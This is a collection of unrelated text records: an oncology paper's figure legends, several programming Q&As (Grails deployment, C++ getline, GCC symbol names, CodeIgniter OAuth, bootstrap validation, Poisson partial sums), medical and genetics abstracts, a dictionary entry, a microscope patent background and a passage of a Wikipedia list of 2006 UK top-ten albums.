viability using the previously described MTT assay.^[@bib56]^ This work was supported by the National Institutes of Health (CA166677) and the Cancer Prevention Research Institute of Texas (RP110465-P1). We thank Dr Eric Hendrickson for providing the human HCT116 and derivative cell lines. [Supplementary Information](#sup1){ref-type="supplementary-material"} accompanies this paper on the Oncogenesis website (http://www.nature.com/oncsis). The authors declare no conflict of interest. Supplementary Material {#sup1} ====================== ###### Click here for additional data file. ![DNA-PKcs is required for Chk2 Thr68 phosphorylation during mitosis. (**a**) Human colon cancer HCT116 cells and derivative DNA-PKcs^−/−^ cells were synchronized with nocodazole (50 ng/ml, 16 h) or were irradiated (4 Gy, 1 h). Whole-cell lysates were separated by electrophoresis and western blotted with the indicated antibodies. (**b**) HeLa cells transfected with a control siRNA or with an siRNA against DNA-PKcs were synchronized with nocodazole (50 ng/ml, 16 h) or were irradiated (4 Gy, 1 h). Whole-cell lysates were separated by electrophoresis and were western blotted with the indicated antibodies. Asynchronous (Asy), mitosis enriched (M), γ-ray irradiation (IR).](oncsis201349f1){#fig1} ![DNA-PKcs kinase inhibition attenuates mitotic induction of Chk2 phosphorylation. (**a**) Wild-type HCT116 cells were treated with nocodazole for 16 h, followed by a 2 h incubation with DMSO or 10 μ[M]{.smallcaps} Nu7441 (Nu). (**b**) HeLa cells were subjected to nocodazole (50 ng/ml, 16 h), followed by a 2 h incubation with DMSO, Nu7441, Ku55933 or both Nu7441 and Ku55933 (left panel). HeLa cells were also irradiated (4 Gy, 1 h) with or without pretreatment with Nu7441 and Ku55933 (right panel).](oncsis201349f2){#fig2} ![Loss of DNA-PKcs increases mitosis defects and chromosomal instability. (**a**) Chromosome numbers from individual metaphase spreads of HCT116, DNA-PKcs^−/−^ and Ligase4^−/−^ cells (n⩾100). (**b**) HCT116, DNA-PKcs^−/−^ and Ligase4^−/−^ cells were treated with 50 ng/ml nocodazole for 16 h, and, after release into fresh medium, they were treated with 10 μ[M]{.smallcaps} MG132 for 3 h. Cells were stained for α-tubulin (red), crest (green) and DNA (blue). (**c**) Exponentially growing HCT116, DNA-PKcs^−/−^ and Ligase4^−/−^ cells were subjected to the same immunofluorescent staining protocol. Arrowheads indicate lagging chromosome. (**d**) Percentage of mitotic cells with misaligned chromosomes from three independent analyses. (**e**) Percentages of mitotic cells showed lagging chromosome were counted from three independent analyses. \*\**P*\<0.01.](oncsis201349f3){#fig3} ![Phosphomimetic Chk2 and BRCA1 mutants partially rescue chromosomal instability in DNA-PKcs-deficient cells. (**a**) DNA-PKcs^−/−^ cells were transfected with constructs for the expression of flag-tagged Chk2 (wild-type, T68A, T68D). Expression of exogenous flag-tagged Chk2 and endogenous Chk2 was evaluated by western blot analysis with α-Chk2 antibody. (**b**) Aberrances in mitosis were analyzed in control and cells expressing flag-Chk2 in two independent experiments. (**c**) DNA-PKcs^−/−^ cells were transfected with Brca1 constructs (wild-type, S988A, and S988E). Expression of wild-type and mutant Brca1 was evaluated by western blot. (**d**) Aberrances in mitosis were calculated from two independent experiments. \**P*\<0.05; \*\**P*\<0.01.](oncsis201349f4){#fig4} ![Phosphomimetic Chk2 alleviates dysregulation of microtubule nucleation in DNA-PKcs^−/−^ cells. (**a**) HCT116 and DNA-PKcs^−/−^ cells were treated with nocodazole to disrupt microtubules. Microtubule nucleation and regrowth was monitored at the indicated time points after nocodazole removal. (**b**) The length of the microtubule emanating from the centrosomes was measured (n⩾50). (**c**) HeLa cells expressing wild-type Chk2 or T68A or T68D mutant Chk2 were transfected with control or DNA-PKcs-targeted siRNA. Forty-eight hours after transfection, cells were subjected to microtubule nucleation analysis (n⩾50). \**P*\<0.05; \*\**P*\<0.01.](oncsis201349f5){#fig5} ![DNA-PKcs deficiency renders cells resistant to paclitaxel. (**a**) HCT116 and DNA-PKcs^−/−^ cells were treated with indicated concentrations of paclitaxel and were analyzed for clonal survival ability. (**b**) HCT116 and DNA-PKcs^−/−^ cells were treated with paclitaxel for 72 h, and viability was determined using an MTT assay. \*\*\**P*\<0.001; \*\*\*\**P*\<0.0001.](oncsis201349f6){#fig6}
{ "pile_set_name": "PubMed Central" }
Q: What's the simplest way to deploy a Grails-generated WAR file? I've been having persistent problems (for several weeks) getting Tomcat to deploy a WAR file. I'm looking for a simple server. It does not need to have a lot of functionality-it just needs to be simple to set up. In particular I'm looking for a program that I can just drop a WAR file into and have the enclosed web application launch. A: You might want to give jetty runner a try. It basically just uses an embedded jetty instance to run your war file. http://blogs.webtide.com/janb/entry/jetty_runner It is available on Maven and it is in fact how heroku apps built with grails are ran. http://devcenter.heroku.com/articles/deploy-a-java-web-application-that-launches-with-jetty-runner A: If your application does not start on tomcat, it almost certainly means it won't start on any servlet container - containers implement a spec, and are very similar in many aspects. What you should do is go and hunt each problem one by one, until the application starts. The problem is the app, not the container.
{ "pile_set_name": "StackExchange" }
Q: is it possible to have getline() function accept wistream& Just for clarification, I'm referring to the global getline() function in the string class. What I want to do is to have something like this: int main() { wifstream in(L"textfile.txt"); someFunc(in); return 0; } void someFunc(const wistream& read) { wstring buff; while(getline(read, buff)) { //do some processing here } } but I'm getting a: Error 2 error C2664: 'std::getline' : cannot convert parameter 1 from 'const std::wistream' to 'std::basic_istream<_Elem,_Traits> &' In order to fix it, I need to remove the const from const wistream& read. I understand why this is happening but is it possible to configure getline() to accept a wistream instead without any conversions or should I just ignore it and remove the const? A: It does accept a wistream, but getline() demands a non-const argument because it modifies the stream. Try changing it to: ... void someFunc(wistream& read) ... A: Reading characters from the stream modifies the stream. You can't mark the stream const and expect that to work correctly.
{ "pile_set_name": "StackExchange" }
Q: What accounts for the dots in the names of these functions I'm debugging why my Boost.Python module won't load in Ubuntu. Interestingly, the problem comes before my module is actually loaded. A simple, foo C++ module confirms this. The stack trace shows calls to boost::python::* which are absent in our larger lib. Thus, I know that the seg fault occurs before my module is even attempted. The below stacktrace is for the failing library which gets a segfault. My question is, what are the dots in the function names? Not all functions have them. For example, frame #62 0x0000000000547692 in PyErr_PrintEx.part.3.42666 (). I can grep through the Python sources and find PyErr_PrintEx, but I don't find the rest. What is that? #0 0x0000000002344596 in ?? () No symbol table info available. #1 0x00007f5f02d72258 in std::string::_S_construct<char const*> (__beg= 0x7f5efb565f46 "amd64", __end=0x7f5efb565f4b "", __a=...) at /usr/include/c++/4.6/bits/basic_string.tcc:134 __dnew = 116 __r = 0x7 #2 0x00007f5efdf505e3 in std::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string(char const*, std::allocator<char> const&) () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 No symbol table info available. #3 0x00007f5efb4ebdfe in pkgInitConfig(Configuration&) () from /usr/lib/x86_64-linux-gnu/libapt-pkg.so.4.12 No symbol table info available. #4 0x00007f5efb7aa395 in ?? () from /usr/lib/python2.7/dist-packages/apt_pkg.so No symbol table info available. #5 0x000000000056d4a4 in PyEval_EvalFrameEx () No locals. #6 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #7 0x0000000000568e58 in PyImport_ExecCodeModuleEx () No locals. #8 0x000000000042bf11 in load_source_module.39049 () No locals. #9 0x0000000000566f80 in load_package.39142 () No locals. #10 0x000000000042c90b in import_submodule.39103 () No locals. #11 0x000000000046895d in load_next.39108 () No locals. #12 0x000000000042d164 in import_module_level.isra.3.39129 () No locals. #13 0x00000000005167db in builtin___import__.32784 () No locals. #14 0x000000000043a8b6 in PyObject_Call () No locals. #15 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #16 0x000000000056f95b in PyEval_EvalFrameEx () No locals. #17 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #18 0x0000000000568e58 in PyImport_ExecCodeModuleEx () No locals. #19 0x000000000042bf11 in load_source_module.39049 () No locals. #20 0x000000000042c90b in import_submodule.39103 () No locals. #21 0x00000000004688d3 in load_next.39108 () No locals. #22 0x000000000042d326 in import_module_level.isra.3.39129 () No locals. #23 0x00000000005167db in builtin___import__.32784 () No locals. #24 0x000000000043a8b6 in PyObject_Call () No locals. #25 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #26 0x000000000056f95b in PyEval_EvalFrameEx () No locals. #27 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #28 0x0000000000568e58 in PyImport_ExecCodeModuleEx () No locals. #29 0x000000000042bf11 in load_source_module.39049 () No locals. #30 0x000000000042c90b in import_submodule.39103 () No locals. #31 0x00000000004688d3 in load_next.39108 () No locals. #32 0x000000000042d326 in import_module_level.isra.3.39129 () No locals. #33 0x00000000005167db in builtin___import__.32784 () No locals. #34 0x000000000043a8b6 in PyObject_Call () No locals. #35 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #36 0x000000000056f95b in PyEval_EvalFrameEx () No locals. #37 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #38 0x0000000000568e58 in PyImport_ExecCodeModuleEx () No locals. #39 0x000000000042bf11 in load_source_module.39049 () No locals. #40 0x000000000042c90b in import_submodule.39103 () No locals. #41 0x00000000004688d3 in load_next.39108 () No locals. #42 0x000000000042d326 in import_module_level.isra.3.39129 () No locals. #43 0x00000000005167db in builtin___import__.32784 () No locals. #44 0x000000000043a8b6 in PyObject_Call () No locals. #45 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #46 0x000000000056f95b in PyEval_EvalFrameEx () No locals. #47 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #48 0x0000000000568e58 in PyImport_ExecCodeModuleEx () No locals. #49 0x000000000042bf11 in load_source_module.39049 () No locals. #50 0x0000000000566f80 in load_package.39142 () No locals. #51 0x000000000042c90b in import_submodule.39103 () No locals. #52 0x00000000004688d3 in load_next.39108 () No locals. #53 0x000000000042d164 in import_module_level.isra.3.39129 () No locals. #54 0x00000000005167db in builtin___import__.32784 () No locals. #55 0x000000000043a8b6 in PyObject_Call () No locals. #56 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #57 0x000000000056f95b in PyEval_EvalFrameEx () No locals. #58 0x00000000005747c0 in PyEval_EvalCodeEx () No locals. #59 0x00000000005697b0 in function_call () No locals. #60 0x000000000043a8b6 in PyObject_Call () No locals. #61 0x000000000043b626 in PyEval_CallObjectWithKeywords () No locals. #62 0x0000000000547692 in PyErr_PrintEx.part.3.42666 () No locals. #63 0x000000000056ae1f in PyRun_InteractiveOneFlags () No locals. #64 0x000000000056b155 in PyRun_InteractiveLoopFlags () No locals. #65 0x000000000056bedc in Py_Main () No locals. #66 0x00007f5f04ae576d in __libc_start_main (main=0x41bae0 <main>, argc=1, ubp_av=0x7fff11b14a38, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fff11b14a28) at libc-start.c:226 result = <optimized out> unwind_buf = {cancel_jmp_buf = {{jmp_buf = {0, 8540347331300905646, 4307688, 140733490219568, 0, 0, -8540148959998029138, -8630196532358589778}, mask_was_saved = 0}}, priv = {pad = { 0x0, 0x0, 0x57d430, 0x7fff11b14a38}, data = {prev = 0x0, cleanup = 0x0, canceltype = 5755952}}} not_first_call = <optimized out> #67 0x000000000041bb11 in _start () No locals. A: The .part forms come from GCC optimization. GCC will sometimes split a function into multiple parts to enable better inlining of one part. For example, a function might have a test that leads to a fast case and a slow case. In this situation GCC may choose to put the test and the fast case into a small inlineable function, and then put the slow case in a .part function. This way the fast path can be inlined into callers.
{ "pile_set_name": "StackExchange" }
Management of abnormal cervical cytology screening in adolescent and young women in a canadian colposcopy centre: a descriptive analysis. To describe and analyze the management of young women referred for colposcopy at a Canadian comprehensive cancer centre for evaluation of atypical squamous intraepithelial lesion of unknown significance (ASC-US) or low-grade squamous intraepithelial lesions (LSIL). We conducted a retrospective descriptive study by searching the eCancerCare Colposcopy Database at our centre for 15- to 29-year-old females with referral cytology of ASC-US and LSIL who were seen between January 2000 and January 2009. Women in three age cohorts (15 to 19 years, 20 to 24 years, and 25 to 29 years) were reviewed for risk factors and relevant medical history, cytology and histology results, treatment, and follow-up visits. A total of 407 women met the entry criteria, with 36 women in the group aged 15 to 19, 173 in the group aged 20 to 24, and 198 in the group aged 25 to 29. Ten excisional procedures were performed among the 36 participants in the group aged 15 to 19, with normal histology found in two (20%), low-grade cervical intraepithelial neoplasia (CIN) in four (40%), and high-grade CIN in four (40%). An excisional procedure was performed in 52 of 173 participants in the group aged 20 to 24, with normal histology in 15%, low-grade CIN in 37%, and high-grade CIN in 48%. Among the group aged 25 to 29, 74 of 198 participants had an excisional procedure, with normal histology in 12%, low-grade CIN in 27%, high-grade CIN in 59%, and microinvasive squamous cell carcinoma in one woman (1%). Many women under the age of 25 who were referred with low-grade abnormal cervical cytology underwent treatment(s) and many did not have significant pathology. One case of microinvasive cervical cancer was identified in a patient in the group aged 25 to 29 over the nine years of our study. Our results support the safety of developing a more conservative and coordinated approach to cervical cancer screening in adolescent and young women in Canada.
{ "pile_set_name": "PubMed Abstracts" }
Q: Boostrapvalidator not fired simple form I am trying to validate my form, the form is having simple elements: but however, the boostrap validator is not called. https://jsfiddle.net/dtjmsy/24hzp7mk/16/ $('#form_hr').bootstrapValidator({ i don' t know where the problem is coming from, can you help me out Cheers A: You need a click event to fire the validate I guess, try this add to the end of your js $(document).ready(function()... : $('#btnsave').click(function() { $('#form_hr').bootstrapValidator('validate'); }); Also if you want to validate field, you need to use their name attribute (ex: name="hr_birthdate") like: <input id="hr_birthdate" name="hr_birthdate" type="text" class="form-control datepicker" placeholder="Please select your birthdate" style="width:100%;" value="" /> Try this one for those update: https://jsfiddle.net/dalinhuang/s3fdej7L/
{ "pile_set_name": "StackExchange" }
reel nedir, reel ne demek? reel USUK Lively dance of the Highlanders of Scotland; also, the music to the dance; often called Scotch reel. Frame with radial arms, or a kind of spool, turning on an axis, on which yarn, threads, lines, or the like, are wound; as, a log reel, used by seamen; an angler's reel; a garden reel. Machine on which yarn is wound and measured into lays and hanks, for cotton or linen it is fifty-four inches in circuit; for worsted, thirty inches. Device consisting of radial arms with horizontal stats, connected with a harvesting machine, for holding the stalks of grain in position to be cut by the knives. To roll. To wind upon a reel, as yarn or thread. To incline, in walking, from one side to the other; to stagger. To have a whirling sensation; to be giddy. The master roll of paper as it comes off the papermaking machine It is in its original width and is then cut into smaller rolls. The reel originated around 1750 in Scotland and the Irish dance masters brought it to full development The music is 4/4 time and it is danced at a relatively fast tempo Both men and women dance the reel For women, it is a light, rapid soft shoe dance that allows for plenty of leaping and demands an energetic performance from the dancer Men often dance the reel in what appears to be hard shoes without the toe tap up front Often a feis will include a special competition in the treble reel Here, dancers in a single line dance right and left leg Some separate out age groups, some combine the age groups into one competition Usually, audiences are extremely enthusiastic in their appreciation for this exciting performance. Polythene Film used on SITMA enclosing machinery is supplied in reels of approximately 35 kilos An average reel of 480mm wide plain film will wrap approx 7000 items. Fast-Paced dance for two or more couples, most common in Scotland and Ireland, but also encountered in Scandinavia and North America. Moderately quick dance in duple meter danced throughout the British Isles; the most popular Irish traditional dance type. To wind or pull in the fly line from the water. The flanged spool on which wire rope or strand is wound for storage or shipment Smooth Faced Drum - Drum with a plain face, not grooved. The act or motion of reeling or staggering; as, a drunken reel. Lively dance of Scottish highlanders; marked by circular moves and gliding steps winder consisting of a revolving spool with a handle; attached to a fishing rod a roll of photographic film holding a series of frames to be projected by a movie projector music composed for dancing a reel wind onto or off a reel. Roll of photographic film holding a series of frames to be projected by a movie projector. Music composed for dancing a reel. Winder consisting of a revolving spool with a handle; attached to a fishing rod. Winder around which thread or tape or film or other flexible materials can be wound.
{ "pile_set_name": "Pile-CC" }
// Distributed under the terms of the MIT license // Test case submitted to project by https://github.com/practicalswift (practicalswift) // Test case found by fuzzing class A{class d<T where f:A{var b{typealias e=a.c
{ "pile_set_name": "Github" }
[Organization of Bsp-repeats in the fox genome]. Bsp repeats comprise approximately 1% of silver for total DNA and are preferentially localized in centromeric regions. Two of Bsp fragments cloned earlier, such as non-homologous rsV1 and rsV3, make up together a Bsp unit (680 bp) and possess a set of sites known to have regulatory functions in eucaryotic genomes. In this work, tandem organization of Bsp repeats is demonstrated. A stretched Bsp sequence (approximately 1460 bp, dimeric form) flanked by BamHI sites was cloned and its restriction map was plotted. With use of rsV1 and rsV3 probes the new sequence exhibited linked structure: rsV1-rsV3-rsV1-rsV3-rsV1. Blot-hybridization with the restriction fragments of fox total DNA suggested hierarchical order of Bsp clustes in the genome. It is supposed that the processes of selective amplification of individual fragments had been of real importance during evolution of Bsp repeats.
{ "pile_set_name": "PubMed Abstracts" }
Q: Integrating OAuth 2.0 with CodeIgniter https://github.com/alexbilbie/CodeIgniter-OAuth-2.0-Server I have found this on GitHub however the steps to implement don't really help with installing the OAuth code into CodeIgniter and haven't found any really good articles on how to do this Has anyone already done this that can offer me help setting this up? A: Hé Hoang, The oAuth library isn't really self explanatory. This is how I got it working: Basics Read the oAuth 2.0 draft 23 just enough to get a basic idea of oAuth, the roles and flows. Then follow the instructions for installing the controller and libraries from alexbilbie in your CodeIgniter install Install the tables and add an application and some roles (think off a Facebook App and the roles you can request permissions for) Make sure you made your validate_user function in the oAuth_server.php file, at the bottom somewhere Do a request Now you want to perform an Authorization Request as a client. These few easy steps are documented in this section. Edit: Philsturgeon's oAuth 2.0 authorization library could be used to automate this. Described here is the manual way. For the library, this means going to: /index.php/oauth?client_id=IN_YOUR_APPLICATION&redirect_uri=IN_YOUR_APPLICATION&response_type=code&scope=YOUR_ROLE Fill in the variabels with the data you've putten in the database. Debug some of the error's it might give.. If all goes well you dit the following: Sign in -> Authorize application -> See you redirect_uri page with ?code=XXXXXXX You'll want that XXXXXXX code Then on the redirect_uri make a post to /index.php/oauth/access_token With these variabels (you know them all now) client_id (in application table) client_secret (in application table) redirect_uri (in application table: where you want to go to save the access_token) code (the XXXXXX) grant_type (must be 'authorization_code') You know this after reading that section! That post returns a JSON string containing the access_token (or an error). YEAH! What's next Save the access_token in you actual application and use it in requests. On your resource server (probably an API and the same CodeIgniter project as the Authorization server I just explained) you need to validate the access_token before returning results. This works like this: $this->load->library('oauth_resource_server'); if (!$this->oauth_resource_server->has_scope(array('account.basic'))) { // Error logic here - "access token does not have correct permission" show_error('An access token is required to request this resource.'); } else { //GO RETURN RESULTS } Hope this gets you up and running! PS: You need to build some admin area to manage applications, sessions and roles yourself though. Eric A: I used another spark library that is really good to use with codeigniter. here is the good tutorial on how to install this with spark and use it. Oauth tutorial for codeigniter
{ "pile_set_name": "StackExchange" }
Confocal microscopes are particularly suitable for the high-resolution measurement in the direction of the Z-axis, i.e., in longitudinal directions of the beam path of the microscope. To this end, confocal microscopes comprise an illuminating unit that typically is a laser. A specimen held by the specimen holding device is illuminated by the illuminating unit. To this end, an optics unit is provided which directs radiation produced by the illuminating unit toward the specimen and directs radiation given off by the specimen toward a detector unit. As a part of the optics, conventional confocal microscopes comprise a beam splitter. On the one hand, the beam splitter directs the light emitted from the illuminating unit toward the specimen and on the other hand, it leaves through the light reflected by the specimen so that it can reach a detector unit arranged behind the beam splitter in the beam path through an aperture diaphragm. As an illuminating unit, different illuminating units may be provided which, for example, produce visible light or also wavelengths in the non-visible range. In front of the detector unit, an aperture diaphragm is arranged and a focusing lens is arranged in front of the latter. By means of the focusing lens, the beam path is focused in the opening of the aperture diaphragm. By focusing the beam path in the opening of the aperture diaphragm, a relatively high light flux reaches the detector. Even a slight defocusing by displacing the object plane in Z-direction leads to a blurred image on the aperture diaphragm. This results in a smaller light flux since the focus of the focusing lens is no longer focused in the opening of the aperture diaphragm and thus, a smaller light flux comes through the diaphragm opening. Displacing the object plane in the X-Y-plane also results in a displacement of the focus in the plane of the aperture diaphragm. Thereby, the light quantity passing the aperture diaphragm is reduced since the focus is no longer focused in the opening of the aperture diaphragm. When confocal microscopes are used in high-throughput screening, the focus of the microscope objective is arranged in a biological or chemical specimen. Since the specimens are minimum quantities of specimen liquid having a volume in the microliter or nanoliter range, the confocal microscope used in high-throughput screening must be a highly precise device. This requirement exists all the more as specimens in the submicroliter range are examined in modern high-throughput screening installations. Because of the required very high accuracy of the focusing in the specimen, even very small temperature changes lead to the maladjustment of the confocal microscope. Particularly, a temperature-dependent maladjustment of the aperture diaphragm itself leads to the impairment of the accuracy of the microscope. Even slight maladjustments lead to that the illumination-side and the detection-side focus are no longer congruent. This results in a signal displacement and a considerable falsification of the measuring results. In addition, in the single-molecule detection, the assumption of the focus geometry is no longer valid in case of even a slight maladjustment. Further, the accuracy of the measuring results is influenced by inaccuracies of the laser by which the focus is displaced as well. Further, the measuring accuracy of confocal microscopes is influenced by the fact that the beam splitter provided in the optics unit has to be exchanged in dependence on the wavelength produced by the laser and given off by the specimen. Upon exchanging the beam splitter, slight position changes thereof occur. This also leads to a focus displacement and thus to a falsification of the measuring results. The beam splitter can displace relative to the excitation optics and the objective by temperature influences. For adjusting, it is known from U.S. Pat. No. 4,863,226 to provide an adjusting mechanism for the aperture diaphragm. By the adjusting mechanism, the aperture diaphragm can be displaced in the direction of the X-Y- and Z-axis. Since the distance and the leading position between the aperture diaphragm and the detector arranged behind the aperture diaphragm have to be observed very closely, it is required to displace the entire detector unit together with the aperture diaphragm. Particularly with modern confocal microscopes, very complicated and sensitive detectors such as photo multiplier or spectographic multidetector arrangements are used. This results in that the detector unit occupies a large building space and is heavy. Therefore, the accurate positioning of the aperture diaphragm in the direction of the three axes is accompanied with considerable mechanical efforts. In this connection, it has to be considered that the adjustment of the aperture diaphragm has to be effected in the micrometer range. From U.S. Pat. No. 5,334,830, it is further known to arrange additional adjustable tilted mirrors for adjusting the aperture diaphragm in the beam path. Aligning the focus with the opening of the aperture diaphragm is thus effected by adjusting the tilted mirrors arranged in the beam path. By arranging additional components such as transparent camera wedges in the beam path, color errors as well as reflection losses occur. Further, the structural length of the microscope increases. It is the object of the invention to provide a microscope which is well adjustable with as small mechanical efforts as possible, particularly in case of highly precise requirements.
{ "pile_set_name": "USPTO Backgrounds" }
Q: Approximations for the partial sums of exponential series Though the question here (Partial sums of exponential series - Stack Exchange) is similar, it is more specialized and I rather need a general approximation for an arbitrary partial sum. Essentially, I am trying to approximate the probability mass function of a particular random variable and I ended up with a Poisson random variable's CDF in the mix. Hence, for my purpose, I need to figure out a reasonable approximation of the sum: $\displaystyle\sum_{k = 0}^{r} \frac{\lambda^k}{k!}$ OR the tail, i.e. $\displaystyle\sum_{k = r}^{\infty} \frac{\lambda^k}{k!}$ Does someone know some approximations for this? Also, if there exist conditions for those approximations to be valid, I'd like to know them as well. Thanks in advance! Addendum: There appears to be a closed form expression for such a partial sum: $\displaystyle\sum_{k = 0}^{r} \frac{\lambda^k}{k!} = e^\lambda \frac{\Gamma(r + 1, \lambda)}{\Gamma(r + 1)}$, where $\Gamma(a, x)$ is defined as: $\displaystyle \Gamma(a, x) = \int_x^\infty t^{a - 1} e^{-t} \,dt$ and $\displaystyle \Gamma(a) = \Gamma(a, 0)$. Is there a simple closed form approximation for the Gamma function? At the end of the day, somehow or the other, I either end up with a summation sign or an integral. I just want to be able to pin down this partial sum as a numeric quantity, that is reasonably approximate. A: Use Taylor's series with remainder. We know that $$ e^\lambda = \sum_{k=0}^r \frac{\lambda^k}{k!} + \frac{e^{c\lambda}\lambda^{r+1}}{(r+1)!}, $$ for some $c \in [0,1]$. Therefore $$ \frac{\lambda^{r+1}}{(r+1)!} \leq e^\lambda - \sum_{k=0}^r \frac{\lambda^k}{k!} \leq e^\lambda \frac{\lambda^{r+1}}{(r+1)!}. $$ You can also get these estimates using more elementary means: $$ \sum_{k=r+1}^\infty \frac{\lambda^k}{k!} = \frac{\lambda^{r+1}}{(r+1)!} \left[ 1 + \frac{\lambda}{r+2} + \frac{\lambda^2}{(r+2)(r+3)} + \cdots \right] < \frac{\lambda^{r+1}}{(r+1)!} \sum_{t=0}^\infty \frac{\lambda^t}{t!} = \frac{\lambda^{r+1}}{(r+1)!} e^\lambda. $$ We can get a different upper bound by comparison to a geometric series, when $\lambda < r+2$: $$ \sum_{k=r+1}^\infty \frac{\lambda^k}{k!} \leq \frac{\lambda^{r+1}}{(r+1)!} \sum_{t=0}^\infty \left(\frac{\lambda}{r+2}\right)^t = \frac{\lambda^{r+1}}{(r+1)!} \frac{r+2}{r+2-\lambda}. $$
{ "pile_set_name": "StackExchange" }
List of UK top-ten albums in 2006 The UK Albums Chart is one of many music charts compiled by the Official Charts Company that calculates the best-selling albums of the week in the United Kingdom. Since 2004 the chart has been based on the sales of both physical albums and digital downloads. This list shows albums that peaked in the Top 10 of the UK Albums Chart during 2006, as well as albums which peaked in 2005 and 2007 but were in the top 10 in 2006. The entry date is when the album appeared in the top 10 for the first time (week ending, as published by the Official Charts Company, which is six days after the chart is announced). One-hundred and thirty-two albums were in the top ten this year. Fourteen albums from 2005 remained in the top 10 for several weeks at the beginning of the year, while Back to Black by Amy Winehouse and Loose by Nelly Furtado were both released in 2006 but did not reach their peak until 2007. Breakaway by Kelly Clarkson, Employment by Kaiser Chiefs, In Between Dreams by Jack Johnson, PCD by The Pussycat Dolls and Stars of CCTV by Hard-Fi were the albums from 2005 to reach their peak in 2006. Two artists scored multiple entries in the top 10 in 2006. Arctic Monkeys, Editors, The Kooks, Rihanna and Shayne Ward were among the many artists who achieved their first UK charting top 10 album in 2006. The 2005 Christmas number-one album, Curtain Call: The Hits by Eminem, remained at the top spot for the first week of 2006. The first new number-one album of the year was First Impressions of Earth by The Strokes. Overall, thirty-three different albums peaked at number-one in 2006, with thirty-three unique artists hitting that position. Background Multiple entries One-hundred and thirty-two albums charted in the top 10 in 2006, with one-hundred and twenty-one albums reaching their peak this year (including Snap!, which charted in previous years but reached a peak on its latest chart run). Two artist scored multiple entries in the top 10 in 2006. Robbie Williams had three top 10 albums this year, while Daniel O'Donnell had two entries. Daniel O'Donnell's two entries were both released this year. Chart debuts Thirty-six artists achieved their first top 10 album in 2006 as a lead artist. The following table (collapsed on desktop site) does not include acts who had previously charted as part of a group and secured their first top 10 solo album, or featured appearances on compilations or other artists recordings. Notes Simon Webbe released his debut album in 2006 during his group Blue's hiatus - he had recorded 3 number-one albums and a number 6 peaking compilation album with his bandmates by that point. David Gilmour was part of the highly successful Pink Floyd but he secured his first solo top 10 album this year with On an Island going straight to the top of the chart. His previous two efforts - 1978's self-titled album (17) and 1984's About Face (21) - both fell short of the top ten. Like fellow Libertines member Pete Doherty with Babyshambles the previous year, Carl Barat hit the chart with his new band Dirty Pretty Things with their debut album Waterloo to Anywhere, peaking at number three. Similarly another new rock band The Raconteurs included The White Stripes frontman Jack White among its line-up. Thom Yorke stepped into the spotlight away from Radiohead with his debut album, The Eraser reaching third position in the chart. Pharrell Williams also reached the top 10 with his first solo effort, In My Mind. With his group N.E.R.D., Fly or Die had previously made the chart. Best-selling albums Snow Patrol had the best-selling album of the year with Eyes Open. The album spent 35 weeks in the top 10 (including three weeks at number one), sold 1.504 million copies and was certified 5x platinum by the BPI. Beautiful World by Take That came in second place. Scissor Sisters' Ta-Dah, Whatever People Say I Am, That's What I'm Not from Arctic Monkeys and Inside In / Inside Out by The Kooks made up the top five. Albums by Razorlight, Oasis, Westlife, Pink and James Morrison were also in the top ten best-selling albums of the year. Top-ten albums Key Entries by artist The following table shows artists who achieved two or more top 10 entries in 2006, including albums that reached their peak in 2005. The figures only include main artists, with featured artists and appearances on compilation albums not counted individually for each artist. The total number of weeks an artist spent in the top ten in 2006 is also shown. Notes Employment re-entered the top 10 at number 7 on 7 January 2006 (week ending) for 10 weeks. Eye to the Telescope re-entered the top 10 at number 6 on 14 January 2006 (week ending) for 2 weeks and at number 4 on 25 February 2006 (week ending) for 5 weeks. Demon Days re-entered the top 10 at number 7 on 25 February 2006 (week ending) for 3 weeks. Monkey Business re-entered the top 10 at number 10 on 22 April 2006 (week ending). X & Y re-entered the top 10 at number 8 on 25 February 2006 (week ending). Stars of CCTV re-entered the top 10 at number 4 on 7 January 2006 (week ending) for 6 weeks. Breakaway re-entered the top 10 at number 10 on 28 January 2006 (week ending) and at number 10 on 11 February 2006 (week ending) for 4 weeks. In Between Dreams re-entered the top 10 at number 9 on 28 January 2006 (week ending), at number 6 on 25 February 2006 (week ending) for 10 weeks and at number 10 on 13 May 2006 (week ending) for 4 weeks. PCD re-entered the top 10 at number 10 on 7 January 2006 (week ending) and at number 7 on 8 July 2006 (week ending) for 2 weeks. Piece by Piece re-entered the top 10 at number 9 on 14 January 2006 (week ending) for 2 weeks. Keep On re-entered the top 10 at number 10 on 21 January 2006 (week ending) for 6 weeks and at number 10 on 6 May 2006 (week ending) for 3 weeks. Greatest Hits by Robbie Williams originally peaked at number-one on its initial release in 2004. Inside In / Inside Out re-entered the top 10 at number 9 on 8 April 2006. (week ending) for 10 weeks, at number 7 on 24 June 2006 (week ending) for 12 weeks and at number 8 on 7 October 2006 (week ending) for 2 weeks. Snap! originally peaked at number 2 upon its initial release in 1983. Corinne Bailey Rae re-entered the top 10 at number 8 on 20 May 2006 (week ending) and at number 10 on 21 October 2006 (week ending). Voice: The Best of Beverley Knight re-entered the top 10 at number 9 on 22 April 2006 (week ending) for 2 weeks. I'm Not Dead re-entered the top 10 at number 5 on 10 June 2006 (week ending), at number 10 on 16 September 2006 (week ending) for 2 weeks and at number 6 on 6 January 2007 (week ending) for 2 weeks. Tired of Hanging Around re-entered the top 10 at number 5 on 8 July 2006 (week ending) for 4 weeks. St. Elsewhere re-entered the top 10 at number 10 on 12 August 2006 (week ending). A Girl like Me re-entered the top 10 at number 10 on 8 July 2006 (week ending) for 7 weeks. Eyes Open re-entered the top 10 at number 6 on 22 July 2006 (week ending) for 16 weeks and at number 7 on 23 December 2006 (week ending) for 12 weeks. Bright Idea re-entered the top 10 at number 4 on 19 August 2006 (week ending) for 3 weeks. Twelve Stops and Home re-entered the top 10 at number 10 on 26 August 2006 (week ending) for 6 weeks. Under the Iron Sea re-entered the top 10 at number 9 on 26 August 2006 (week 